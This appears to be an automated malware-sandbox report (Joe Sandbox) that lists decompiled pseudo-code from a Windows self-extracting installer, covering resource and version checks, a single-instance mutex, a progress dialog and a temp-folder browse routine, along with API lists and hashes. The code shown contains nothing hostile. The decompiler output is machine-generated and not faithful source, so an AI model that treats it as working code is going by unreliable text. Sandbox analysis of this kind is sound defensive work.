                                                                                                                                                                                                        									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                        									if(_t31 != 0) {
                                                                                                                                                                                                        										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0x1f8184 != 0) {
                                                                                                                                                                                                        										__imp__#17();
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0x1f8a24 == 0) {
                                                                                                                                                                                                        										_t57 = _t65;
                                                                                                                                                                                                        										if(E001F36EE(_t65) == 0) {
                                                                                                                                                                                                        											goto L33;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t33 =  *0x1f9a40; // 0x3
                                                                                                                                                                                                        											_t48 = 1;
                                                                                                                                                                                                        											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                        												if(( *0x1f9a34 & 0x00000100) == 0 || ( *0x1f8a38 & 0x00000001) != 0 || E001F18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                        													goto L30;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t64 = 0x7d6;
                                                                                                                                                                                                        													if(E001F6517(_t57, 0x7d6, _t34, E001F19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                        														goto L33;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												L30:
                                                                                                                                                                                                        												_t23 = _t48;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t23 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E001F2390(0x1f8a3a);
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t64 = 0x520;
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								E001F44B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 =  &_v268;
                                                                                                                                                                                                        							if(E001F468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        								goto L3;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                        								 *0x1f8588 = _t43;
                                                                                                                                                                                                        								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(( *0x1f9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                        										_t64 = 0x524;
                                                                                                                                                                                                        										if(E001F44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                        											goto L12;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L11;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t64 = 0x54b;
                                                                                                                                                                                                        										E001F44B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                        										L11:
                                                                                                                                                                                                        										CloseHandle( *0x1f8588);
                                                                                                                                                                                                        										 *0x1f9124 = 0x800700b7;
                                                                                                                                                                                                        										goto L33;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t64 = 0x4b1;
                                                                                                                                                                                                        						E001F44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						 *0x1f9124 = 0x80070714;
                                                                                                                                                                                                        						L33:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x001f2cb5
                                                                                                                                                                                                        0x001f2cbc
                                                                                                                                                                                                        0x001f2cc7
                                                                                                                                                                                                        0x001f2cc9
                                                                                                                                                                                                        0x001f2cd1
                                                                                                                                                                                                        0x001f2cd3
                                                                                                                                                                                                        0x001f2cd9
                                                                                                                                                                                                        0x001f2ce9
                                                                                                                                                                                                        0x001f2cf9
                                                                                                                                                                                                        0x001f2d0e
                                                                                                                                                                                                        0x001f2d15
                                                                                                                                                                                                        0x001f2d1c
                                                                                                                                                                                                        0x001f2ef3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2d2d
                                                                                                                                                                                                        0x001f2d34
                                                                                                                                                                                                        0x001f2d3b
                                                                                                                                                                                                        0x001f2d40
                                                                                                                                                                                                        0x001f2d48
                                                                                                                                                                                                        0x001f2d59
                                                                                                                                                                                                        0x001f2d84
                                                                                                                                                                                                        0x001f2e1f
                                                                                                                                                                                                        0x001f2e1f
                                                                                                                                                                                                        0x001f2e2e
                                                                                                                                                                                                        0x001f2e41
                                                                                                                                                                                                        0x001f2e5a
                                                                                                                                                                                                        0x001f2e62
                                                                                                                                                                                                        0x001f2e6c
                                                                                                                                                                                                        0x001f2e6c
                                                                                                                                                                                                        0x001f2e75
                                                                                                                                                                                                        0x001f2e77
                                                                                                                                                                                                        0x001f2e77
                                                                                                                                                                                                        0x001f2e84
                                                                                                                                                                                                        0x001f2e8b
                                                                                                                                                                                                        0x001f2e94
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2e96
                                                                                                                                                                                                        0x001f2e96
                                                                                                                                                                                                        0x001f2e9e
                                                                                                                                                                                                        0x001f2ea2
                                                                                                                                                                                                        0x001f2eba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2ece
                                                                                                                                                                                                        0x001f2ede
                                                                                                                                                                                                        0x001f2eed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2eed
                                                                                                                                                                                                        0x001f2eef
                                                                                                                                                                                                        0x001f2eef
                                                                                                                                                                                                        0x001f2eef
                                                                                                                                                                                                        0x001f2eef
                                                                                                                                                                                                        0x001f2ea2
                                                                                                                                                                                                        0x001f2e86
                                                                                                                                                                                                        0x001f2e88
                                                                                                                                                                                                        0x001f2e88
                                                                                                                                                                                                        0x001f2e43
                                                                                                                                                                                                        0x001f2e48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2e48
                                                                                                                                                                                                        0x001f2e30
                                                                                                                                                                                                        0x001f2e30
                                                                                                                                                                                                        0x001f2ef8
                                                                                                                                                                                                        0x001f2f01
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2f01
                                                                                                                                                                                                        0x001f2d8a
                                                                                                                                                                                                        0x001f2d8f
                                                                                                                                                                                                        0x001f2da1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2da3
                                                                                                                                                                                                        0x001f2dae
                                                                                                                                                                                                        0x001f2db4
                                                                                                                                                                                                        0x001f2dbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2dca
                                                                                                                                                                                                        0x001f2dd3
                                                                                                                                                                                                        0x001f2df5
                                                                                                                                                                                                        0x001f2e02
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2dd5
                                                                                                                                                                                                        0x001f2dde
                                                                                                                                                                                                        0x001f2de3
                                                                                                                                                                                                        0x001f2e04
                                                                                                                                                                                                        0x001f2e0a
                                                                                                                                                                                                        0x001f2e10
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2e10
                                                                                                                                                                                                        0x001f2dd3
                                                                                                                                                                                                        0x001f2dbb
                                                                                                                                                                                                        0x001f2da1
                                                                                                                                                                                                        0x001f2d5b
                                                                                                                                                                                                        0x001f2d5b
                                                                                                                                                                                                        0x001f2d5d
                                                                                                                                                                                                        0x001f2d69
                                                                                                                                                                                                        0x001f2d6e
                                                                                                                                                                                                        0x001f2f06
                                                                                                                                                                                                        0x001f2f06
                                                                                                                                                                                                        0x001f2f06
                                                                                                                                                                                                        0x001f2d59
                                                                                                                                                                                                        0x001f2f18

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 001F2CD9
                                                                                                                                                                                                        • memset.MSVCRT ref: 001F2CE9
                                                                                                                                                                                                        • memset.MSVCRT ref: 001F2CF9
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46A0
                                                                                                                                                                                                          • Part of subcall function 001F468F: SizeofResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46A9
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46C3
                                                                                                                                                                                                          • Part of subcall function 001F468F: LoadResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46CC
                                                                                                                                                                                                          • Part of subcall function 001F468F: LockResource.KERNEL32(00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46D3
                                                                                                                                                                                                          • Part of subcall function 001F468F: memcpy_s.MSVCRT ref: 001F46E5
                                                                                                                                                                                                          • Part of subcall function 001F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46EF
                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F2D34
                                                                                                                                                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 001F2D40
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 001F2DAE
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 001F2DBD
                                                                                                                                                                                                        • CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 001F2E0A
                                                                                                                                                                                                          • Part of subcall function 001F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                          • Part of subcall function 001F44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
                                                                                                                                                                                                        • API String ID: 1002816675-2654900392
                                                                                                                                                                                                        • Opcode ID: b6f5a0698bf9cba314d1eb00520754142b0b0223b33320dd2db3ffb28be1f979
                                                                                                                                                                                                        • Instruction ID: a0d522d68e9be38e132178c5c75f4c7a7c99ed6c0d1939fc33a1d15843dce24e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6f5a0698bf9cba314d1eb00520754142b0b0223b33320dd2db3ffb28be1f979
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F5138B030430DABE724B7749D4AB7B3698EB95710F244039FB45D65E2EFB88C81C621
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                                                        			E001F34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				struct HWND__* _t35;
                                                                                                                                                                                                        				struct HWND__* _t38;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t9 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t9 == 0) {
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					 *0x1f91d8 = 1;
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                                        					L21:
                                                                                                                                                                                                        					EndDialog();
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				_pop(1);
                                                                                                                                                                                                        				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                        					if(_a12 != 0x1b) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t13 = _t12 - 0xe;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t35 = _a4;
                                                                                                                                                                                                        					 *0x1f8584 = _t35;
                                                                                                                                                                                                        					E001F43D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                        					__eflags =  *0x1f8184; // 0x1
                                                                                                                                                                                                        					if(__eflags != 0) {
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                        					_t17 = CreateThread(0, 0, E001F4FE0, 0, 0, 0x1f8798);
                                                                                                                                                                                                        					 *0x1f879c = _t17;
                                                                                                                                                                                                        					__eflags = _t17;
                                                                                                                                                                                                        					if(_t17 != 0) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						E001F44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t35);
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t23 = _t13 - 1;
                                                                                                                                                                                                        				if(_t23 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 2;
                                                                                                                                                                                                        					if(_a12 != 2) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					ResetEvent( *0x1f858c);
                                                                                                                                                                                                        					_t38 =  *0x1f8584; // 0x0
                                                                                                                                                                                                        					_t25 = E001F44B9(_t38, 0x4b2, 0x1f1140, 0, 0x20, 4);
                                                                                                                                                                                                        					__eflags = _t25 - 6;
                                                                                                                                                                                                        					if(_t25 == 6) {
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						 *0x1f91d8 = 1;
                                                                                                                                                                                                        						SetEvent( *0x1f858c);
                                                                                                                                                                                                        						_t39 =  *0x1f879c; // 0x0
                                                                                                                                                                                                        						E001F3680(_t39);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t25 - 1;
                                                                                                                                                                                                        					if(_t25 == 1) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetEvent( *0x1f858c);
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t23 == 0xe90) {
                                                                                                                                                                                                        					TerminateThread( *0x1f879c, 0);
                                                                                                                                                                                                        					EndDialog(_a4, _a12);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        0x001f34fb
                                                                                                                                                                                                        0x001f34fe
                                                                                                                                                                                                        0x001f3665
                                                                                                                                                                                                        0x001f3666
                                                                                                                                                                                                        0x001f3666
                                                                                                                                                                                                        0x001f3668
                                                                                                                                                                                                        0x001f366e
                                                                                                                                                                                                        0x001f366e
                                                                                                                                                                                                        0x001f3671
                                                                                                                                                                                                        0x001f3671
                                                                                                                                                                                                        0x001f3677
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3677
                                                                                                                                                                                                        0x001f3504
                                                                                                                                                                                                        0x001f3506
                                                                                                                                                                                                        0x001f3507
                                                                                                                                                                                                        0x001f350c
                                                                                                                                                                                                        0x001f365b
                                                                                                                                                                                                        0x001f365f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3661
                                                                                                                                                                                                        0x001f3512
                                                                                                                                                                                                        0x001f3515
                                                                                                                                                                                                        0x001f35be
                                                                                                                                                                                                        0x001f35c1
                                                                                                                                                                                                        0x001f35d1
                                                                                                                                                                                                        0x001f35d8
                                                                                                                                                                                                        0x001f35de
                                                                                                                                                                                                        0x001f35f8
                                                                                                                                                                                                        0x001f3617
                                                                                                                                                                                                        0x001f3617
                                                                                                                                                                                                        0x001f3623
                                                                                                                                                                                                        0x001f3637
                                                                                                                                                                                                        0x001f363d
                                                                                                                                                                                                        0x001f3642
                                                                                                                                                                                                        0x001f3644
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3646
                                                                                                                                                                                                        0x001f3652
                                                                                                                                                                                                        0x001f3657
                                                                                                                                                                                                        0x001f3658
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3658
                                                                                                                                                                                                        0x001f3644
                                                                                                                                                                                                        0x001f351b
                                                                                                                                                                                                        0x001f351d
                                                                                                                                                                                                        0x001f354f
                                                                                                                                                                                                        0x001f3553
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f355f
                                                                                                                                                                                                        0x001f3565
                                                                                                                                                                                                        0x001f357c
                                                                                                                                                                                                        0x001f3581
                                                                                                                                                                                                        0x001f3584
                                                                                                                                                                                                        0x001f359b
                                                                                                                                                                                                        0x001f35a1
                                                                                                                                                                                                        0x001f35a7
                                                                                                                                                                                                        0x001f35ad
                                                                                                                                                                                                        0x001f35b3
                                                                                                                                                                                                        0x001f35b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f35b8
                                                                                                                                                                                                        0x001f3586
                                                                                                                                                                                                        0x001f3588
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3590
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3590
                                                                                                                                                                                                        0x001f3524
                                                                                                                                                                                                        0x001f3535
                                                                                                                                                                                                        0x001f3541
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3549
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000), ref: 001F3535
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 001F3541
                                                                                                                                                                                                        • ResetEvent.KERNEL32 ref: 001F355F
                                                                                                                                                                                                        • SetEvent.KERNEL32(001F1140,00000000,00000020,00000004), ref: 001F3590
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 001F35C7
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 001F35F1
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 001F35F8
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 001F3610
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 001F3617
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 001F3623
                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 001F3637
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 001F3671
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 2406144884-3940384054
                                                                                                                                                                                                        • Opcode ID: cb9f5de2bf6db8139fa10fe9005e55d258bc8b9b88af398a9701e29cdf3fdf4a
                                                                                                                                                                                                        • Instruction ID: ff40693aa9b5e763f100af8ba08bef16f4923b3dcc31ccfecf0256033df2fcc8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb9f5de2bf6db8139fa10fe9005e55d258bc8b9b88af398a9701e29cdf3fdf4a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F331D2B0244309BBD7205F24EC4DE3B3A69EBC5B20F544529F72AD5AB0CB758A80CA51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                        			E001F4224(char __ecx) {
                                                                                                                                                                                                        				char* _v8;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				char* _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				char* _t61;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				char* _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                                        				char _t76;
                                                                                                                                                                                                        				intOrPtr _t85;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t67 = __ecx;
                                                                                                                                                                                                        				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                        				if(_t66 == 0) {
                                                                                                                                                                                                        					_t63 = 0x4c2;
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					E001F44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                        				_v12 = _t26;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t63 = 0x4c1;
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                        				_v20 = _t28;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                        				_v16 = _t29;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t76 =  *0x1f88c0; // 0x0
                                                                                                                                                                                                        				if(_t76 != 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					 *0x1f87a0 = 0;
                                                                                                                                                                                                        					_v52 = _t67;
                                                                                                                                                                                                        					_v48 = 0;
                                                                                                                                                                                                        					_v44 = 0;
                                                                                                                                                                                                        					_v40 = 0x1f8598;
                                                                                                                                                                                                        					_v36 = 1;
                                                                                                                                                                                                        					_v32 = E001F4200;
                                                                                                                                                                                                        					_v28 = 0x1f88c0;
                                                                                                                                                                                                        					 *0x1fa288( &_v52);
                                                                                                                                                                                                        					_t32 =  *_v12();
                                                                                                                                                                                                        					if(_t71 != _t71) {
                                                                                                                                                                                                        						asm("int 0x29");
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_v12 = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						 *0x1fa288(_t32, 0x1f88c0);
                                                                                                                                                                                                        						 *_v16();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *0x1f88c0 != 0) {
                                                                                                                                                                                                        							E001F1680(0x1f87a0, 0x104, 0x1f88c0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0x1fa288(_v12);
                                                                                                                                                                                                        						 *_v20();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t85 =  *0x1f87a0; // 0x0
                                                                                                                                                                                                        					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					GetTempPathA(0x104, 0x1f88c0);
                                                                                                                                                                                                        					_t61 = 0x1f88c0;
                                                                                                                                                                                                        					_t4 =  &(_t61[1]); // 0x1f88c1
                                                                                                                                                                                                        					_t65 = _t4;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t42 =  *_t61;
                                                                                                                                                                                                        						_t61 =  &(_t61[1]);
                                                                                                                                                                                                        					} while (_t42 != 0);
                                                                                                                                                                                                        					_t5 = _t61 - _t65 + 0x1f88c0; // 0x3f1181
                                                                                                                                                                                                        					_t44 = CharPrevA(0x1f88c0, _t5);
                                                                                                                                                                                                        					_v8 = _t44;
                                                                                                                                                                                                        					if( *_t44 == 0x5c &&  *(CharPrevA(0x1f88c0, _t44)) != 0x3a) {
                                                                                                                                                                                                        						 *_v8 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}




























                                                                                                                                                                                                        0x001f4234
                                                                                                                                                                                                        0x001f423c
                                                                                                                                                                                                        0x001f4240
                                                                                                                                                                                                        0x001f43b2
                                                                                                                                                                                                        0x001f43b7
                                                                                                                                                                                                        0x001f43c0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f43c5
                                                                                                                                                                                                        0x001f424c
                                                                                                                                                                                                        0x001f4252
                                                                                                                                                                                                        0x001f4257
                                                                                                                                                                                                        0x001f43a4
                                                                                                                                                                                                        0x001f43a5
                                                                                                                                                                                                        0x001f43ab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f43ab
                                                                                                                                                                                                        0x001f4263
                                                                                                                                                                                                        0x001f4269
                                                                                                                                                                                                        0x001f426e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f427a
                                                                                                                                                                                                        0x001f4280
                                                                                                                                                                                                        0x001f4285
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f428d
